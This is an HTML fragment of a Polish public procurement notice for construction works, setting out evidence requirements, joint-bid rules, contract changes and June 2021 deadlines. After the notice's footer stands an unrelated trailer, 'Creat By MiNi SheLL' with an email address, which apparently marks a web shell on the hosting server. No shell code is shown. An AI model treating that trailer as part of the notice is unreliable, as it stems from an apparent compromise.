ustawy z dnia 23 lipca 2003 roku o ochronie zabytków<br/>i opiece nad zabytkami (tj. Dz. U. z 2020 r., poz. 282 ze zm.) <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">- w celu wykazania spełniania warunku udziału w postępowaniu<br/>- wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia<br/>publicznego, w szczególności odpowiedzialnych za świadczenie usług,<br/>kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami<br/>na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także<br/>zakresu wykonywanych przez nie czynności oraz informacją o podstawie do<br/>dysponowania tymi osobami; załącznik nr 6 do SWZ;</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> W celu wykazania, że zaoferowane spełniają wymagania, Zamawiający żąda,<br/>aby Wykonawca złożył wraz z ofertą następujące przedmiotowe środki<br/>dowodowe:<br/>1) Wykaz wyrobów równoważnych, jeżeli Wykonawca takie oferuje; <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Wykaz wyrobów równoważnych, jeżeli Wykonawca takie oferuje; <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Pełnomocnictwo ustanowione do reprezentowania Wykonawcy/ów<br/>ubiegającego/cych się o udzielenie zamówienia publicznego, jeżeli dotyczy. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia<br/>albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia<br/>publicznego – nie dotyczy spółki cywilnej, o ile upoważnienie/pełnomocnictwo do<br/>występowania w imieniu tej spółki wynika z dołączonej do oferty umowy spółki bądź<br/>wszyscy wspólnicy podpiszą ofertę.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, zobowiązani się<br/>złożyć wraz z ofertą stosowne pełnomocnictwo – zgodnie z ust. 3.3. rozdz. XVI SWZ<br/>– nie dotyczy spółki cywilnej, o ile upoważnienie/pełnomocnictwo do występowania<br/>w imieniu tej spółki wynika z dołączonej do oferty umowy spółki bądź wszyscy<br/>wspólnicy podpiszą ofertę.<br/>Uwaga<br/>Pełnomocnictwo, o którym mowa powyżej może wynikać albo z dokumentu<br/>pod taką samą nazwą, albo z umowy Wykonawców wspólnie ubiegających się<br/>o udzielenie zamówienia.<br/>4. Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich<br/>Wykonawców występujących wspólnie (przez każdego z Wykonawców lub<br/>upoważnionego pełnomocnika).<br/>5. W przypadku wspólnego ubiegania się o udzielenie zamówienie przez<br/>Wykonawców oświadczenie, o którym mowa w art. 125 ustawy (ust. 3.1. rozdziału<br/>XVI SWZ) składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/>Oświadczenia te potwierdzają spełnianie warunków udziału w postępowaniu w<br/>zakresie, w którym Wykonawca wspólnie ubiegający się o udzielenie zamówienia<br/>wykazuje spełnianie warunków udziału w postępowaniu, oraz brak podstaw<br/>wykluczenia - każdy z Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia nie może podlegać wykluczeniu z postępowania w oparciu o wskazane<br/>w SWZ podstawy wykluczenia. Powyższe oznacza, iż:<br/>5.1.Oświadczenie w zakresie braku podstaw wykluczenia musi złożyć każdy z<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia;<br/>5.2.Oświadczenie o spełnianiu warunków udziału składa podmiot, który w odniesieniu<br/>do danego warunku udziału w postępowaniu potwierdza jego spełnianie;<br/>dopuszcza się oświadczenie złożone łącznie, tj. podpisane przez wszystkie<br/>podmioty wspólnie składające ofertę lub przez pełnomocnika występującego w<br/>imieniu wszystkich podmiotów.<br/>6. W przypadku, o którym mowa w art. 117 ust. 2 lub ust. 3 ustawy, Wykonawcy<br/>wspólnie ubiegający się o udzielenie zamówienia zobowiązani są dołączyć do oferty<br/>oświadczenie, o którym mowa w art. 117 ust. 4 ustawy („ (…) z którego wynika, które<br/>roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy.”).<br/>7. Wszelka korespondencja prowadzona będzie wyłącznie z podmiotem<br/>występującym jako pełnomocnik Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Projektowane postanowienia umowy w sprawie zamówienia publicznego, które<br/>zostaną wprowadzone do treści tej umowy, zawiera załącznik nr 5 do SWZ.<br/>1.1.Zamawiający przewiduje możliwość zmian postanowień zawartej umowy (tzw.<br/>zmiany kontraktowe w oparciu o art. 455 ust. 1 pkt 1 ustawy) w stosunku do<br/>treści oferty, na podstawie której dokonano wyboru Wykonawcy, zgodnie z<br/>warunkami zawartymi w załączniku nr 5 do SWZ.<br/>1.2.Zmiana umowy może także nastąpić w przypadkach, o których mowa w art. 455 ust. 1 pkt 2-4 oraz ust. 2 ustawy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-06-22 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://urazowka.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-06-22 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-07-21</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zgodnie z art. 310 pkt 1 ustawy p.z.p. Zamawiający przewiduje możliwość unieważnienia<br/>przedmiotowego postępowania, jeżeli środki, które Zamawiający zamierzał przeznaczyć na<br/>sfinansowanie całości lub części zamówienia, nie zostały mu przyznane.</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-06-03 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com